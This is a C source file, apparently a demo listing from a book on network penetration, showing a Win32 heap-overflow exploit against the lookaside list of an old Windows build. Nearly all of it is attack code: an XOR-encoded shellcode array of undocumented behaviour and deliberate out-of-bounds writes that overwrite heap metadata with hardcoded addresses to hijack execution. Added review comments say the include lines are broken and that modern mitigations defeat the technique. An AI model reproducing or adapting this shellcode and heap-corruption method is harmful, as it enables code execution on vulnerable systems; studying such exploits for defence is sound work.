/* lookaside_test.c
 *
 * Demonstration program from the book "Network Penetration Technology"
 * (《网络渗透技术》)
 * Authors: san, alert7, eyas, watercloud
 *
 * Win32 heap-overflow demo targeting the lookaside list.
 *
 * NOTE(review): the two #include directives below lost their header names
 * in extraction (angle-bracketed names stripped), so the file as shown does
 * not compile. The code calls HeapCreate/HeapAlloc/HeapFree/HeapDestroy
 * (Win32 heap API) and memcpy/memset/strlen (C string functions); the
 * missing headers are presumably <windows.h> and <string.h> — confirm
 * against the original source. Kept byte-identical here.
 *
 * The bracketed markers [1]..[5] in main() are presumably cross-references
 * to the book's walkthrough of this listing; they are kept as-is.
 */
#include
#include

/*
 * Payload bytes that main() copies into the heap with memcpy() sized by
 * strlen(), so the array must contain no 0x00 byte before its terminator;
 * none appears in this listing. The bytes are opaque machine code whose
 * behaviour cannot be determined from this file without disassembly, and
 * is deliberately not documented here.
 */
char shellcode[]=
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x58\x01\x80\x34\x0b\xf8\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\xda\xf9\xf8\xf8\xa7\x9c\x59\xc8"
"\xf8\xf8\xf8\xa8\x73\xb8\xf4\x73\xb8\xe4\x73\x90\xf0\xa8\x73\x0f"
"\x92\xfa\xa1\x10\x39\xf8\xf8\xf8\x1a\x01\xa0\x73\xf8\x73\x90\xf0"
"\xa0\x07\xce\x77\xb8\xd8\x07\x8e\xfc\x77\xb8\xdc\x92\xfb\xa1\x10"
"\x5d\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f\x8b\xca\xa7"
"\xac\x07\xae\xf0\x73\x10\x92\xfd\xa1\x10\x73\xf8\xf8\xf8\x1a\x01"
"\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae\xec\xa8"
"\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe0\x73\x20\xcb\x38\xa8\xa8"
"\xa8\x73\x04\x9e\x3f\xff\xfa\xf8\x9e\x73\xbe\xd0\x7e\x3c\x9e\x71"
"\xbf\xfa\x92\xe8\xaf\xab\x07\xae\xe4\x92\xf9\xab\x07\xae\xd8\xa8"
"\xa8\xab\x07\xae\xdc\x73\x20\x90\x9b\x95\x9c\xf8\x75\xec\xdc\x7b"
"\x14\xac\x73\x04\x92\xec\xa1\xcb\x38\x71\xfc\x77\x1a\x03\x3e\xbf"
"\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71\xa7\xb0\x71\xa7\xb4\x71\xa7"
"\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9\x92\xf9\xa9\xa9\xaa\xa9\x07"
"\xae\xf4\xcb\x38\xb0\xa8\x07\xae\xe8\xa9\xae\x73\x8d\xc4\x73\x8c"
"\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb\x0d\xcb\x31\xb1\xb9\x55\xfb"
"\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c\xf0\x39\x33\xff\xfb\x22\xb8"
"\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6\xdc\xfb\x25\x9e\x73\xf4\xb3"
"\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb\x3d\x53\xa6\xa1\x3b\x10\x21"
"\x06\x07\x07\x06\xdc\x81\x9c\x22\x06\xf1\x6e\xca\x8c\x69\xf4\x31"
"\x44\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c"
"\xe8\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9\xa4\xe9\x47\x1d";

/*
 * Entry point of the demo: creates a private heap, performs deliberate
 * out-of-bounds writes past HeapAlloc'd blocks, and then drives the
 * allocator through further HeapAlloc/HeapFree calls on the corrupted heap.
 *
 * Non-standard signature: hosted C requires `int main(void)`; `void main()`
 * is kept byte-identical here. None of the Heap* return values are checked.
 *
 * Every 0x7ffdxxxx / 0x0039xxxx constant below is an absolute pointer into
 * one specific process layout of one specific Windows build of the
 * pre-ASLR era. They are meaningless on any other system, which is why the
 * demo is not portable and why address-space randomisation and hardened
 * heap metadata (cookies, safe unlinking, lookaside removal) defeat it.
 */
void main()
{
    HANDLE hHeap;
    char *buf1, *buf2;

    /* flags = 2 is a magic number — presumably HEAP_GROWABLE; confirm against winnt.h */
    hHeap = HeapCreate(2, 64*1024, 0); /* [1] */
    buf1 = HeapAlloc(hHeap, 0, 1024);
    buf2 = HeapAlloc(hHeap, 0, 8);

    /* Out-of-bounds write: 16 bytes placed immediately past the end of the
     * 1024-byte block buf1 — presumably over the allocator's own bookkeeping
     * for the neighbouring chunk. This is the overflow the demo models; a
     * bounds-checked copy, a hardened allocator, or a page-heap debugging
     * setting would catch it at this line. */
    memcpy(buf1+1024, "\x01\x00\x01\x00\x01\x10\x08\x01", 8);
    *(unsigned int *)&buf1[1024+8] = 0x7ffdf250;
    *(unsigned int *)&buf1[1024+8+4] = 0x00390718; /* [2] */

    HeapFree(hHeap, 0, buf1); /* [3] */
    HeapFree(hHeap, 0, buf2);

    /* Second deliberate overflow: 512 bytes of filler written into a
     * 16-byte block, then the payload copied in at offset 4. */
    buf1 = HeapAlloc(hHeap, 0, 16); /* [4] */
    memset(buf1, 'A', 512);
    memcpy(buf1+4, shellcode, strlen(shellcode));
    HeapFree(hHeap, 0, buf1);

    /* Two 64-byte blocks. buf1 receives three 8-byte records at offsets 0,
     * 32 and 64; the first two are each followed by two 32-bit absolute
     * values (0x90909090 is four x86 NOP bytes), and the third record at
     * offset 64 is once more written past the end of the block. */
    buf1 = HeapAlloc(hHeap, 0, 64); /* [5] */
    buf2 = HeapAlloc(hHeap, 0, 64);
    memcpy(buf1, "\x02\x00\x02\x00\x31\x40\x01\x01", 8);
    *(unsigned int *)&buf1[8] = 0x7ffdf020;
    *(unsigned int *)&buf1[8+4] = 0x7ffdf250;
    memcpy(buf1+32, "\x02\x00\x02\x00\x31\x40\x01\x01", 8);
    *(unsigned int *)&buf1[32+8] = 0x90909090;
    *(unsigned int *)&buf1[32+8+4] = 0x7ffdf250;
    memcpy(buf1+64, "\x02\x00\x08\x00\x31\x41\x08\x01", 8);

    /* Frees in reverse order of allocation, then tears the private heap down. */
    HeapFree(hHeap, 0, buf2);
    HeapFree(hHeap, 0, buf1);
    HeapDestroy(hHeap);
}